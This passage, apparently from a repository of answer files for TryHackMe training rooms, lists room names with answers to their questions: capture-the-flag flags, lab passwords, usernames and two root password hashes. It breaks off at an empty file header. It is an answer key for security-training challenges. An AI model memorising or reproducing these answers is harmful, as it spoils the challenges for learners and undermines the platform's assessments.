e257d58481412f8772e9fb9fd47d8ca4 12 | -------------------------------------------------------------------------------- /rooms/injectics.txt: -------------------------------------------------------------------------------- 1 | Injectics 2 | https://tryhackme.com/room/injectics 3 | 4 | What is the flag value after logging into the admin panel? 5 | THM{INJECTICS_ADMIN_PANEL_007} 6 | 7 | What is the content of the hidden text file in the flags folder? 8 | THM{5735172b6c147f4dd649872f73e0fdea} 9 | -------------------------------------------------------------------------------- /rooms/madeyes castle.txt: -------------------------------------------------------------------------------- 1 | Madeye's Castle 2 | https://tryhackme.com/room/madeyescastle 3 | 4 | User1.txt 5 | RME{th3-b0Y-wHo-l1v3d-f409da6f55037fdc} 6 | 7 | User2.txt 8 | RME{p1c0-iZ-oLd-sk00l-nANo-64e977c63cb574e6} 9 | 10 | Root.txt 11 | RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf} 12 | -------------------------------------------------------------------------------- /rooms/nerdherd.txt: -------------------------------------------------------------------------------- 1 | NerdHerd 2 | https://tryhackme.com/room/nerdherd 3 | 4 | User Flag 5 | THM{7fc91d70e22e9b70f98aaf19f9a1c3ca710661be} 6 | 7 | Root Flag 8 | THM{5c5b7f0a81ac1c00732803adcee4a473cf1be693} 9 | 10 | Bonus Flag 11 | THM{a975c295ddeab5b1a5323df92f61c4cc9fc88207} 12 | -------------------------------------------------------------------------------- /rooms/umbrella.txt: -------------------------------------------------------------------------------- 1 | Umbrella 2 | https://tryhackme.com/room/umbrella 3 | 4 | What is the DB password? 5 | Ng1-f3!Pe7-e5?Nf3xe5 6 | 7 | What is the user flag? 8 | THM{d832c0e4cf71312708686124f7a6b25e} 9 | 10 | What is the root flag? 11 | THM{1e15fbe7978061c6bb1924124fd9eab2} 12 | -------------------------------------------------------------------------------- /rooms/undiscovered.txt: -------------------------------------------------------------------------------- 1 | Undiscovered 2 | https://tryhackme.com/room/undiscoveredup 3 | 4 | user.txt 5 | THM{8d7b7299cccd1796a61915901d0e091c} 6 | 7 | Whats the root user's password hash? 8 | $6$1VMGCoHv$L3nX729XRbQB7u3rndC.8wljXP4eVYM/SbdOzT1IET54w2QVsVxHSH.ghRVRxz5Na5UyjhCfY6iv/koGQQPUB0 9 | -------------------------------------------------------------------------------- /rooms/envizon.txt: -------------------------------------------------------------------------------- 1 | envizon 2 | https://tryhackme.com/room/envizon 3 | 4 | What password is used by the current envizon instance? 5 | rE8Z*qyM!DTKNP8fGu4T3CtW*aurBQwLF 6 | 7 | local.txt 8 | 7953ba7f83b3fd00279627de052bc078 9 | 10 | root.txt 11 | 40963d170c949f8325783c552e150236 12 | -------------------------------------------------------------------------------- /rooms/light.txt: -------------------------------------------------------------------------------- 1 | Light 2 | https://tryhackme.com/room/lightroom 3 | 4 | What is the admin username? 5 | TryHackMeAdmin 6 | 7 | What is the password to the username mentioned in question 1? 8 | mamZtAuMlrsEy5bp6q17 9 | 10 | What is the flag? 11 | THM{SQLit3_InJ3cTion_is_SimplE_nO?} 12 | -------------------------------------------------------------------------------- /rooms/overpass 3 - hosting.txt: -------------------------------------------------------------------------------- 1 | Overpass 3 - Hosting 2 | https://tryhackme.com/room/overpass3hosting 3 | 4 | Web Flag 5 | thm{0ae72f7870c3687129f7a824194be09d} 6 | 7 | User Flag 8 | thm{3693fc86661faa21f16ac9508a43e1ae} 9 | 10 | Root flag 11 | thm{a4f6adb70371a4bceb32988417456c44} 12 | -------------------------------------------------------------------------------- /rooms/thats the ticket.txt: -------------------------------------------------------------------------------- 1 | That's The Ticket 2 | https://tryhackme.com/room/thatstheticket 3 | 4 | What is IT Supports email address? 5 | adminaccount@itsupport.thm 6 | 7 | Admin users password 8 | 123123 9 | 10 | Flag inside Ticket 1 11 | THM{6804f45260135ec8418da2d906328473} 12 | -------------------------------------------------------------------------------- /rooms/the london bridge.txt: -------------------------------------------------------------------------------- 1 | The London Bridge 2 | https://tryhackme.com/room/thelondonbridge 3 | 4 | What is the user flag? 5 | THM{l0n6_l1v3_7h3_qu33n} 6 | 7 | What is the root flag? 8 | THM{l0nd0n_br1d63_p47ch3d} 9 | 10 | What is the password of charles? 11 | thekingofengland 12 | -------------------------------------------------------------------------------- /rooms/windows privesc arena.txt: -------------------------------------------------------------------------------- 1 | Windows PrivEsc Arena 2 | https://tryhackme.com/room/windowsprivescarena 3 | 4 | Open a command prompt and run 'net user'. Who is the other non-default user on the machine? 5 | TCM 6 | 7 | What is the cleartext password found in Unattend.xml? 8 | password123 9 | -------------------------------------------------------------------------------- /rooms/retro.txt: -------------------------------------------------------------------------------- 1 | Retro 2 | https://tryhackme.com/room/retro 3 | 4 | A web server is running on the target. What is the hidden directory which the website lives on? 5 | /retro 6 | 7 | user.txt 8 | 3b99fbdc6d430bfb51c72c651a261927 9 | 10 | root.txt 11 | 7958b569565d7bd88d10c6f22d1c4063 12 | -------------------------------------------------------------------------------- /rooms/weaponization.txt: -------------------------------------------------------------------------------- 1 | Weaponization 2 | https://tryhackme.com/room/weaponization 3 | 4 | Which method is used to distribute payloads to a victim at social events? 5 | USB Delivery 6 | 7 | What is the flag? Hint: Check the user desktop folder for the flag! 8 | THM{b4dbc2f16afdfe9579030a929b799719} 9 | -------------------------------------------------------------------------------- /rooms/obscure.txt: -------------------------------------------------------------------------------- 1 | Obscure 2 | https://tryhackme.com/room/obscured 3 | 4 | What's the initial flag? 5 | THM{1243b64a3a01a8732ccb96217f593520} 6 | 7 | What's the user flag? 8 | THM{43b0b68ba2755dd6cac3b8bf5454db94} 9 | 10 | What's the root flag? 11 | THM{8bbc6221d009576d37e28acdd9da7aba} 12 | -------------------------------------------------------------------------------- /rooms/pickle rick.txt: -------------------------------------------------------------------------------- 1 | Pickle Rick 2 | https://tryhackme.com/room/picklerick 3 | 4 | What is the first ingredient that Rick needs? 5 | mr. meeseek hair 6 | 7 | What is the second ingredient in Rick’s potion? 8 | 1 jerry tear 9 | 10 | What is the last and final ingredient? 11 | fleeb juice 12 | -------------------------------------------------------------------------------- /rooms/brainstorm.txt: -------------------------------------------------------------------------------- 1 | Brainstorm 2 | https://tryhackme.com/room/brainstorm 3 | 4 | How many ports are open? 5 | 3 6 | 7 | What is the name of the exe file you found? 8 | chatserver.exe 9 | 10 | After gaining access, what is the content of the root.txt file? 11 | 5b1001de5a44eca47eee71e7942a8f8a 12 | -------------------------------------------------------------------------------- /rooms/python playground.txt: -------------------------------------------------------------------------------- 1 | Python Playground 2 | https://tryhackme.com/room/pythonplayground 3 | 4 | What is flag 1? 5 | THM{7e0b5cf043975e3c104a458a8d4f6f2f} 6 | 7 | What is flag 2? 8 | THM{69a36d6f9da10d23ca0dbfdf6e691ec5} 9 | 10 | What is flag 3? 11 | THM{be3adc69c25ad14eb79da4eb57925ad1} 12 | -------------------------------------------------------------------------------- /rooms/spring.txt: -------------------------------------------------------------------------------- 1 | Spring 2 | https://tryhackme.com/room/spring 3 | 4 | What's the flag in foothold.txt? 5 | THM{dont_expose_.git_to_internet} 6 | 7 | What's the flag in user.txt? 8 | THM{this_is_still_password_reuse} 9 | 10 | What's the flag in root.txt? 11 | THM{sshd_does_not_mind_the_junk} 12 | -------------------------------------------------------------------------------- /rooms/startup.txt: -------------------------------------------------------------------------------- 1 | Startup 2 | https://tryhackme.com/room/startup 3 | 4 | What is the secret spicy soup recipe? 5 | love 6 | 7 | What are the contents of user.txt? 8 | THM{03ce3d619b80ccbfb3b7fc81e46c0e79} 9 | 10 | What are the contents of root.txt? 11 | THM{f963aaa6a430f210222158ae15c3d76d} 12 | -------------------------------------------------------------------------------- /rooms/lookback.txt: -------------------------------------------------------------------------------- 1 | Lookback 2 | https://tryhackme.com/room/lookback 3 | 4 | What is the service user flag? 5 | THM{Security_Through_Obscurity_Is_Not_A_Defense} 6 | 7 | What is the user flag? 8 | THM{Stop_Reading_Start_Doing} 9 | 10 | What is the root flag? 11 | THM{Looking_Back_Is_Not_Always_Bad} 12 | -------------------------------------------------------------------------------- /rooms/olympus.txt: -------------------------------------------------------------------------------- 1 | Olympus 2 | https://tryhackme.com/room/olympusroom 3 | 4 | What is Flag 1? 5 | flag{Sm4rt!_k33P_d1gGIng} 6 | 7 | What is Flag 2? 8 | flag{Y0u_G0t_TH3_l1ghtN1nG_P0w3R} 9 | 10 | What is Flag 3? 11 | flag{D4mN!_Y0u_G0T_m3_:)_} 12 | 13 | What is Flag 4? 14 | flag{Y0u_G0t_m3_g00d!} 15 | -------------------------------------------------------------------------------- /rooms/pylon.txt: -------------------------------------------------------------------------------- 1 | pyLon 2 | https://tryhackme.com/room/pylonzf 3 | 4 | What is Flag 1? 5 | THM{homebrew_password_manager} 6 | 7 | What is User1 flag? 8 | TMM{easy_does_it} 9 | 10 | What is User2 flag? 11 | THM{homebrew_encryption_lol} 12 | 13 | What is root's flag? 14 | ThM{OpenVPN_script_pwn} 15 | -------------------------------------------------------------------------------- /rooms/year of the fox.txt: -------------------------------------------------------------------------------- 1 | Year of the Fox 2 | https://tryhackme.com/room/yotf 3 | 4 | What is the web flag? 5 | THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw} 6 | 7 | What is the user flag? 8 | THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk} 9 | 10 | What is the root flag? 11 | THM{ODM3NTdkMDljYmM4ZjdhZWFhY2VjY2Fk} 12 | -------------------------------------------------------------------------------- /rooms/you got mail.txt: -------------------------------------------------------------------------------- 1 | You Got Mail 2 | https://tryhackme.com/room/yougotmail 3 | 4 | What is the user flag? 5 | THM{l1v1n_7h3_br1ck_l1f3} 6 | 7 | What is the password of the user wrohit? 8 | superstar 9 | 10 | What is the password to access the hMailServer Administrator Dashboard? 11 | password 12 | -------------------------------------------------------------------------------- /rooms/examinerx9.txt: -------------------------------------------------------------------------------- 1 | Examinerx9 2 | https://tryhackme.com/room/Examinerctfx9 3 | 4 | Someone uploaded a file what is the name? 5 | readme.txt 6 | 7 | What encoding method is used for the credentials in this dataset? 8 | base64 9 | 10 | What is the username? 11 | root 12 | 13 | What is the password? 14 | da861049go 15 | -------------------------------------------------------------------------------- /rooms/dockmagic.txt: -------------------------------------------------------------------------------- 1 | DockMagic 2 | https://tryhackme.com/room/dockmagic 3 | 4 | What is the value of flag 1? 5 | THM{c674a7e5c42cc4cae67ee0a03e26743c} 6 | 7 | What is the value of flag 2? 8 | THM{2c8203d84b1269a605a362bf4200c691} 9 | 10 | What is the value of flag 3? 11 | THM{dc887d7a23fa028d7892bc85389bc381} 12 | -------------------------------------------------------------------------------- /rooms/getting started.txt: -------------------------------------------------------------------------------- 1 | Getting Started 2 | https://tryhackme.com/room/gettingstarted 3 | 4 | What is the name of the hidden admin page? 5 | /test-admin 6 | 7 | What is the username and password in the form username:password? 8 | admin:admin 9 | 10 | How many user are signed up to the application? 11 | 3 12 | -------------------------------------------------------------------------------- /rooms/the marketplace.txt: -------------------------------------------------------------------------------- 1 | The Marketplace 2 | https://tryhackme.com/room/marketplace 3 | 4 | What is flag 1? 5 | THM{c37a63895910e478f28669b048c348d5} 6 | 7 | What is flag 2? (User.txt) 8 | THM{c3648ee7af1369676e3e4b15da6dc0b4} 9 | 10 | What is flag 3? (Root.txt) 11 | THM{d4f76179c80c0dcf46e0f8e43c9abd62} 12 | -------------------------------------------------------------------------------- /rooms/the witchs cauldron.txt: -------------------------------------------------------------------------------- 1 | The Witch's Cauldron 2 | https://tryhackme.com/room/cauldron 3 | 4 | What is the flag that is returned after completing The Witch's Cauldron? 5 | THM{y0u_br3w3d_7h3_53cr37} 6 | 7 | What is the flag that is returned after decrypting encrypted_spell.enc? 8 | THM{525403e42fbda51dfd0572025d78062f} 9 | -------------------------------------------------------------------------------- /rooms/vulnnet endgame.txt: -------------------------------------------------------------------------------- 1 | VulnNet: Endgame 2 | https://tryhackme.com/room/vulnnetendgame 3 | 4 | What is the password of the CMS administrator? 5 | vAxWtmNzeTz 6 | 7 | What is the user flag? 8 | THM{fb84e79072015186c72ec77ded49a5ff} 9 | 10 | What is the root flag? 11 | THM{1d42edbb03c0b287a8d0d8a265dce012} 12 | -------------------------------------------------------------------------------- /rooms/ad badsuccessor.txt: -------------------------------------------------------------------------------- 1 | AD: BadSuccessor 2 | https://tryhackme.com/room/adbadsuccessor 3 | 4 | Which version of MS Windows introduced dMSA? 5 | Windows Server 2025 6 | 7 | What is the username of the third account? 8 | ditall 9 | 10 | What is the flag on the Administrator’s Desktop? 11 | THM{Successors_Unplanned_Upgrade} 12 | -------------------------------------------------------------------------------- /rooms/certain doom.txt: -------------------------------------------------------------------------------- 1 | CERTain Doom 2 | https://tryhackme.com/room/certaindoom 3 | 4 | What is the web flag? 5 | THM{c4T_g07_73H_d353r14L1z4710N_8lu3z} 6 | 7 | What is the user's flag? 8 | THM{1n73Rn4L_53rV1C35_n07_45_H1dD3N_4S_7H3Y_533|\/|} 9 | 10 | What is the super secret flag? 11 | THM{H1dD3|\|_1n_Pl41N_516h7} 12 | -------------------------------------------------------------------------------- /rooms/super secret tip.txt: -------------------------------------------------------------------------------- 1 | Super Secret TIp 2 | https://tryhackme.com/room/supersecrettip 3 | 4 | What is flag1.txt? 5 | THM{LFI_1s_Pr33Ty_Aw3s0Me_1337} 6 | 7 | What is the passphrase for flag2.txt? 8 | 110920001386 9 | 10 | What is flag2.txt? 11 | THM{cronjobs_F1Le_iNPu7_cURL_4re_5c4ry_Wh3N_C0mb1n3d_t0g3THeR} 12 | -------------------------------------------------------------------------------- /rooms/break out the cage.txt: -------------------------------------------------------------------------------- 1 | Break Out The Cage 2 | https://tryhackme.com/room/breakoutthecage1 3 | 4 | What is Weston's password? 5 | Mydadisghostrideraintthatcoolnocausehesonfirejokes 6 | 7 | What's the user flag? 8 | THM{M37AL_0R_P3N_T35T1NG} 9 | 10 | What's the root flag? 11 | THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3} 12 | -------------------------------------------------------------------------------- /rooms/reloaded.txt: -------------------------------------------------------------------------------- 1 | REloaded 2 | https://tryhackme.com/room/reloaded 3 | 4 | Flag ? 5 | L3v3lZ340_is_D02e 6 | 7 | Flag ? 8 | 1709 9 | 10 | Flag ? 11 | L3_1s_20t_Th3_L131t 12 | 13 | Which instruction did you modified? 14 | jnz 15 | 16 | Flag ? 17 | THMctf-L4 18 | 19 | Flag? 20 | Alan Turing Was a Geniuse 21 | -------------------------------------------------------------------------------- /rooms/the great escape.txt: -------------------------------------------------------------------------------- 1 | The Great Escape 2 | https://tryhackme.com/room/thegreatescape 3 | 4 | Find the flag hidden in the webapp 5 | THM{b801135794bf1ed3a2aafaa44c2e5ad4} 6 | 7 | Find the root flag? 8 | THM{0cb4b947043cb5c0486a454b75a10876} 9 | 10 | Find the real root flag 11 | THM{c62517c0cad93ac93a92b1315a32d734} 12 | -------------------------------------------------------------------------------- /rooms/backtrack.txt: -------------------------------------------------------------------------------- 1 | Backtrack 2 | https://tryhackme.com/room/backtrack 3 | 4 | What is the content of flag1.txt? 5 | THM{823e4e40ead9683b06a8194eab01cee8} 6 | 7 | What is the content of flag2.txt? 8 | THM{01d8e83d0ea776345fa9bf4bc08c249d} 9 | 10 | What is the content of flag3.txt? 11 | THM{f728e7c00162e6d316720155a4a06fa8} 12 | -------------------------------------------------------------------------------- /rooms/introduction to owasp zap.txt: -------------------------------------------------------------------------------- 1 | Introduction to OWASP ZAP 2 | https://tryhackme.com/room/learnowaspzap 3 | 4 | What does ZAP stand for? 5 | Zed Attack Proxy 6 | 7 | What IP do we use for the proxy? 8 | 127.0.0.1 9 | 10 | Use ZAP to bruteforce the DVWA 'brute-force' page. What's the password? 11 | password 12 | -------------------------------------------------------------------------------- /rooms/memory forensics.txt: -------------------------------------------------------------------------------- 1 | Memory Forensics 2 | https://tryhackme.com/room/memoryforensics 3 | 4 | What is John's password? 5 | charmander999 6 | 7 | When was the machine last shutdown? 8 | 2020-12-27 22:50:12 9 | 10 | What did John write? 11 | You_found_me 12 | 13 | What is the TrueCrypt passphrase? 14 | forgetmenot 15 | -------------------------------------------------------------------------------- /rooms/scripting.txt: -------------------------------------------------------------------------------- 1 | Scripting 2 | https://tryhackme.com/room/scripting 3 | 4 | What is the final string? 5 | HackBack2019= 6 | 7 | Once you have done all operations, what number do you get (rounded to 2 decimal places at the end of your calculation)? 8 | 344769.12 9 | 10 | What is the flag? 11 | THM{eW-sCrIpTiNg-AnD-cRyPtO} 12 | -------------------------------------------------------------------------------- /rooms/gotta catchem all!.txt: -------------------------------------------------------------------------------- 1 | Gotta Catch'em All! 2 | https://tryhackme.com/room/pokemon 3 | 4 | Find the Grass-Type Pokemon 5 | PoKeMoN{Bulbasaur} 6 | 7 | Find the Water-Type Pokemon 8 | Squirtle_SqUaD{Squirtle} 9 | 10 | Find the Fire-Type Pokemon 11 | P0k3m0n{Charmander} 12 | 13 | Who is Root's Favorite Pokemon? 14 | Pikachu! 15 | -------------------------------------------------------------------------------- /rooms/tryhack3m tricipher summit.txt: -------------------------------------------------------------------------------- 1 | TryHack3M: TriCipher Summit 2 | https://tryhackme.com/room/tryhack3mencryptionchallenge 3 | 4 | What is Flag 1? 5 | THM{the.quieter.you.become.the.more.you.will.hear} 6 | 7 | What is Flag 2? 8 | THM{Custom.crypto.can't.stop.you} 9 | 10 | What is Flag 3? 11 | THM{emptying_the_deposit_3_million} 12 | -------------------------------------------------------------------------------- /rooms/baron samedit.txt: -------------------------------------------------------------------------------- 1 | Baron Samedit 2 | https://tryhackme.com/room/sudovulnssamedit 3 | 4 | After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)? 5 | sudo-hax-me-a-sandwich 6 | 7 | You should now have a root shell -- what is the flag in /root/flag.txt? 8 | THM{NmU4OWYwMWJmMjkxMDdiYTU4MWIxNWVk} 9 | -------------------------------------------------------------------------------- /rooms/binary heaven.txt: -------------------------------------------------------------------------------- 1 | Binary Heaven 2 | https://tryhackme.com/room/binaryheaven 3 | 4 | What is the username? 5 | guardian 6 | 7 | What is the password? 8 | GOg0esGrrr! 9 | 10 | What is the flag? 11 | THM{crack3d_th3_gu4rd1an} 12 | 13 | binexgod_flag.txt 14 | THM{b1n3xg0d_pwn3d} 15 | 16 | root.txt 17 | THM{r00t_of_th3_he4v3n} 18 | -------------------------------------------------------------------------------- /rooms/blog.txt: -------------------------------------------------------------------------------- 1 | Blog 2 | https://tryhackme.com/room/blog 3 | 4 | root.txt 5 | 9a0b2b618bef9bfa7ac28c1353d9f318 6 | 7 | user.txt 8 | c8421899aae571f7af486492b71a8ab7 9 | 10 | Where was user.txt found? 11 | /media/usb 12 | 13 | What CMS was Billy using? 14 | Wordpress 15 | 16 | What version of the above CMS was being used? 17 | 5.0 18 | -------------------------------------------------------------------------------- /rooms/pwnkit cve-2021-4034.txt: -------------------------------------------------------------------------------- 1 | Pwnkit: CVE-2021-4034 2 | https://tryhackme.com/room/pwnkit 3 | 4 | Is Pwnkit exploitable remotely (Aye/Nay)? 5 | Nay 6 | 7 | In which Polkit utility does the Pwnkit vulnerability reside? 8 | pkexec 9 | 10 | What is the flag located at /root/flag.txt? 11 | THM{CONGRATULATIONS-YOU-EXPLOITED-PWNKIT} 12 | 13 | -------------------------------------------------------------------------------- /rooms/the bandit surfer.txt: -------------------------------------------------------------------------------- 1 | The Bandit Surfer 2 | https://tryhackme.com/room/surfingyetiiscomingtotown 3 | 4 | What is the user flag? 5 | THM{SQli_SsRF_2_WeRkZeuG_PiN_ExPloit} 6 | 7 | What is the root flag? 8 | THM{BaNDiT_YeTi_Lik3s_PATH_HijacKing} 9 | 10 | What is the yetikey4.txt flag? 11 | 4-3f$FEBwD6AoqnyLjJ!!Hk4tc*V6w$UuK#evLWkBp 12 | -------------------------------------------------------------------------------- /koth/food.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | thm{0c48608136e6f8c86aecdb5d4c3d7ba8} 3 | thm{237741b0835c77a30a4a7ef3393f8a7d} 4 | thm{2f30841ff8d9646845295135adda8332} 5 | thm{4675c55160bb806ef39172976bc0aa5f} 6 | thm{58a3cb46855af54d0660b34fd20a04c1} 7 | thm{5a926ab5d3561e976f4ae5a7e2d034fe} 8 | thm{7baf5aa8491a4b7b1c2d231a24aec575} 9 | thm{9f1ee18d3021d135b03b943cc58f34db} 10 | -------------------------------------------------------------------------------- /rooms/crypto failures.txt: -------------------------------------------------------------------------------- 1 | Crypto Failures 2 | https://tryhackme.com/room/cryptofailures 3 | 4 | What is the value of the web flag? 5 | THM{ok_you_f0und_w3b_fl4g_6cbe2bc} 6 | 7 | What is the encryption key? 8 | THM{Traditional_Own_Crypto_is_Always_Surprising!_and_this_hopefully_is_not_easy_to_crack_e41d20b5b0989cac65ed4a090cace944bf30e6d3ab88f9d447f52fd2140525b9} 9 | -------------------------------------------------------------------------------- /rooms/linux backdoors.txt: -------------------------------------------------------------------------------- 1 | Linux Backdoors 2 | https://tryhackme.com/room/linuxbackdoors 3 | 4 | In what directory do we place our keys ? 5 | .ssh 6 | 7 | What flag in ssh do we use to show our private key? 8 | -i 9 | 10 | What does the letter "m" mean in cronjobs? 11 | minute 12 | 13 | What does the letter "h" mean in cronjobs? 14 | hour 15 | -------------------------------------------------------------------------------- /rooms/minotaurs labyrinth.txt: -------------------------------------------------------------------------------- 1 | Minotaur's Labyrinth 2 | https://tryhackme.com/room/labyrinth8llv 3 | 4 | What is flag 1? 5 | fl4g{tHa75_TH3_$7Ar7_ftPFLA9} 6 | 7 | What is flag 2? 8 | fla6{7H@Ts_tHe_Dat48as3_F149} 9 | 10 | What is the user flag? 11 | fla9{5upeR_secr37_uSEr_flaG} 12 | 13 | What is the root flag? 14 | fL4G{YoU_R0OT3d_1T_coN9ra7$} 15 | -------------------------------------------------------------------------------- /rooms/osiris.txt: -------------------------------------------------------------------------------- 1 | Osiris 2 | https://tryhackme.com/room/osiris 3 | 4 | Flag 1 5 | THM{89b556686aa61301d4a72a7b12e59368a516c940} 6 | 7 | Flag 2 8 | THM{d9c19f35fccde779d645f19d5bb0ac41dcd3586f} 9 | 10 | Flag 3 11 | THM{a77538464954d29a64c607f2318d930ccf4da5cccb308c7334c43fef9c94984448cf732f6de227cbfae9172ee2654e56704568ada698fb241c52148d338a3245} 12 | -------------------------------------------------------------------------------- /rooms/simplehelp cve-2024-57727.txt: -------------------------------------------------------------------------------- 1 | SimpleHelp: CVE-2024-57727 2 | https://tryhackme.com/room/simplehelpcve202457727 3 | 4 | What is the flag hidden in flag.txt? The flag.txt file is in the same directory as serverconfig.xml. 5 | THM{9ND23PVA} 6 | 7 | What is the flag hidden in flag.txt? The flag.txt file is in the same directory as serverconfig.xml. 8 | THM{X8733EEZ} 9 | -------------------------------------------------------------------------------- /rooms/starting out in cyber sec.txt: -------------------------------------------------------------------------------- 1 | Starting Out In Cyber Sec 2 | https://tryhackme.com/room/startingoutincybersec 3 | 4 | What is the name of the career role that is legally employed to find vulnerabilities in applications? 5 | penetration tester 6 | 7 | What is the name of the role who's job is to identify attacks against an organisation? 8 | security analyst 9 | -------------------------------------------------------------------------------- /rooms/stuxctf.txt: -------------------------------------------------------------------------------- 1 | StuxCTF 2 | https://tryhackme.com/room/stuxctf 3 | 4 | user.txt 5 | 0b6044b7807dd100b9e30f1bd09db53f 6 | 7 | root.txt 8 | 0028454003b42601548df551b738976c 9 | 10 | What is the hidden directory? 11 | 47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055 12 | -------------------------------------------------------------------------------- /koth/offline.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | THM{02592D82BBA02DE324F72496B393D16F} 3 | THM{1A44E1ED498294F9AA218F1742A160AA} 4 | THM{44EF79C7857DAFEC76F6E3F0F3263060} 5 | THM{4F2900F2FDFAF3F77BD599391218F49F} 6 | THM{7878847D55C22F58E3A702FC10D98C54} 7 | THM{89F288757F4D0693C99B007855FC075E} 8 | THM{95B20C5626EB94E68812FF93A6F8B7A0} 9 | THM{C7914ACADABBCA1DE6287BD624953BA6} 10 | -------------------------------------------------------------------------------- /rooms/bounty hacker.txt: -------------------------------------------------------------------------------- 1 | Bounty Hacker 2 | https://tryhackme.com/room/cowboyhacker 3 | 4 | Who wrote the task list? 5 | lin 6 | 7 | What service can you bruteforce with the text file found? 8 | SSH 9 | 10 | What is the users password? 11 | RedDr4gonSynd1cat3 12 | 13 | user.txt 14 | THM{CR1M3_SyNd1C4T3} 15 | 16 | root.txt 17 | THM{80UN7Y_h4cK3r} 18 | -------------------------------------------------------------------------------- /rooms/dogcat.txt: -------------------------------------------------------------------------------- 1 | dogcat 2 | https://tryhackme.com/room/dogcat 3 | 4 | What is flag 1? 5 | THM{Th1s_1s_N0t_4_Catdog_ab67edfa} 6 | 7 | What is flag 2? 8 | THM{LF1_t0_RC3_aec3fb} 9 | 10 | What is flag 3? 11 | THM{D1ff3r3nt_3nv1ronments_874112} 12 | 13 | What is flag 4? 14 | THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} 15 | -------------------------------------------------------------------------------- /rooms/geolocating images.txt: -------------------------------------------------------------------------------- 1 | Geolocating Images 2 | https://tryhackme.com/room/geolocatingimages 3 | 4 | Where in the world is image 1? The answer is the country name. 5 | China 6 | 7 | Where was image 2 taken? 8 | Wrigleyville Sports 9 | 10 | Where was image 3 taken? 11 | Meudon Observatory 12 | 13 | Where is image 4 taken? 14 | Abbey Road 15 | 16 | -------------------------------------------------------------------------------- /rooms/learning cyber security.txt: -------------------------------------------------------------------------------- 1 | Learning Cyber Security 2 | https://tryhackme.com/room/beginnerpathintro 3 | 4 | What is the username of the BookFace account you will be taking over? 5 | Ben.Spring 6 | 7 | Hack the BookFace account to reveal this task's answer! 8 | THM{BRUTEFORCING} 9 | 10 | How much did the data breach cost Target? 11 | $300 million 12 | -------------------------------------------------------------------------------- /rooms/shaker.txt: -------------------------------------------------------------------------------- 1 | Shaker 2 | https://tryhackme.com/room/shaker 3 | 4 | Get a shell and find the first flag! 5 | THM{OGZlMzhlMTQyYWMyZTExMjQyNDM2NmIyNTM4NDM3NTI=} 6 | 7 | Can you find Bob's flag? 8 | THM{NTA2NTJiYTNmYWQ3NGViMzEyMDIyM2EwODY2MzM1YWQ=} 9 | 10 | Now that you're here, go on, root me :) 11 | THM{NzFkZGRjNmRkZWQzNWMxZTM3MjM0ZGFlMmVkZDk3MTc=} 12 | -------------------------------------------------------------------------------- /rooms/b3dr0ck.txt: -------------------------------------------------------------------------------- 1 | b3dr0ck 2 | https://tryhackme.com/room/b3dr0ck 3 | 4 | What is the barney.txt flag? 5 | THM{f05780f08f0eb1de65023069d0e4c90c} 6 | 7 | What is fred's password? 8 | YabbaDabbaD0000! 9 | 10 | What is the fred.txt flag? 11 | THM{08da34e619da839b154521da7323559d} 12 | 13 | What is the root.txt flag? 14 | THM{de4043c009214b56279982bf10a661b7} 15 | -------------------------------------------------------------------------------- /rooms/breaking crypto the simple way.txt: -------------------------------------------------------------------------------- 1 | Breaking Crypto the Simple Way 2 | https://tryhackme.com/room/breakingcryptothesimpleway 3 | 4 | What is the flag? 5 | THM{Psssss_4nd_Qsssssss} 6 | 7 | What is the secret used to encrypt the message? 8 | sunshine 9 | 10 | What is the flag? 11 | THM{3nD_2_3nd_is_n0t_c0mpl1c4ted} 12 | 13 | What is the flag? 14 | THM{flip_n_flip} 15 | -------------------------------------------------------------------------------- /rooms/hip flask.txt: -------------------------------------------------------------------------------- 1 | Hip Flask 2 | https://tryhackme.com/room/hipflask 3 | 4 | Is the network portion internal or external? 5 | External 6 | 7 | What subdomain hosts the webapp we're looking for? 8 | hipper 9 | 10 | What is the root user's password hash? 11 | $6$./Fh3mWMsk8X29kq$6CvaDzV7zlXKn1MMQjXtO.abB4/7ecNKBFkQvEWsLkgM8raAZeuSHZurnXG01pqZ4BY2ubk/WgIbo4ee.wnaP0 12 | -------------------------------------------------------------------------------- /rooms/request smuggling websockets.txt: -------------------------------------------------------------------------------- 1 | Request Smuggling: WebSockets 2 | https://tryhackme.com/room/wsrequestsmuggling 3 | 4 | Which status code signals a successful WebSocket upgrade? 5 | 101 6 | 7 | What is the value of the flag? 8 | THM{bf208caddc31c6bb52621fdc2b3a73e5} 9 | 10 | What is the value of the flag? 11 | THM{a87d4e5b777c010ed3266e59fb42ccac} 12 | 13 | -------------------------------------------------------------------------------- /rooms/tomcat cve-2024-50379.txt: -------------------------------------------------------------------------------- 1 | Tomcat: CVE-2024-50379 2 | https://tryhackme.com/room/tomcatcve202450379 3 | 4 | What is the acronym that stands for Time-of-check Time-of-use? 5 | TOCTOU 6 | 7 | A Tomcat server is listening on MACHINE_IP at port 8080. What is its version? 8 | 10.1.25 9 | 10 | What are the contents of the flag.txt file on the C:\ drive? 11 | THM{M9bN6cF3} 12 | -------------------------------------------------------------------------------- /rooms/convertmyvideo.txt: -------------------------------------------------------------------------------- 1 | ConvertMyVideo 2 | https://tryhackme.com/room/convertmyvideo 3 | 4 | What is the name of the secret folder? 5 | admin 6 | 7 | What is the user to access the secret folder? 8 | itsmeadmin 9 | 10 | What is the user flag? 11 | flag{0d8486a0c0c42503bb60ac77f4046ed7} 12 | 13 | What is the root flag? 14 | flag{d9b368018e912b541a4eb68399c5e94a} 15 | -------------------------------------------------------------------------------- /rooms/ra 2.txt: -------------------------------------------------------------------------------- 1 | Ra 2 2 | https://tryhackme.com/room/ra2 3 | 4 | What is flag 1? 5 | THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources} 6 | 7 | What is flag 2? 8 | THM{8a1d460dfe345f8edd09d45ae00e5c1c14d12c89} 9 | 10 | What is flag 3? 11 | THM{9a8b9f4f3af2bce68885106c1c8473ab85e0eda0} 12 | -------------------------------------------------------------------------------- /rooms/theseus.txt: -------------------------------------------------------------------------------- 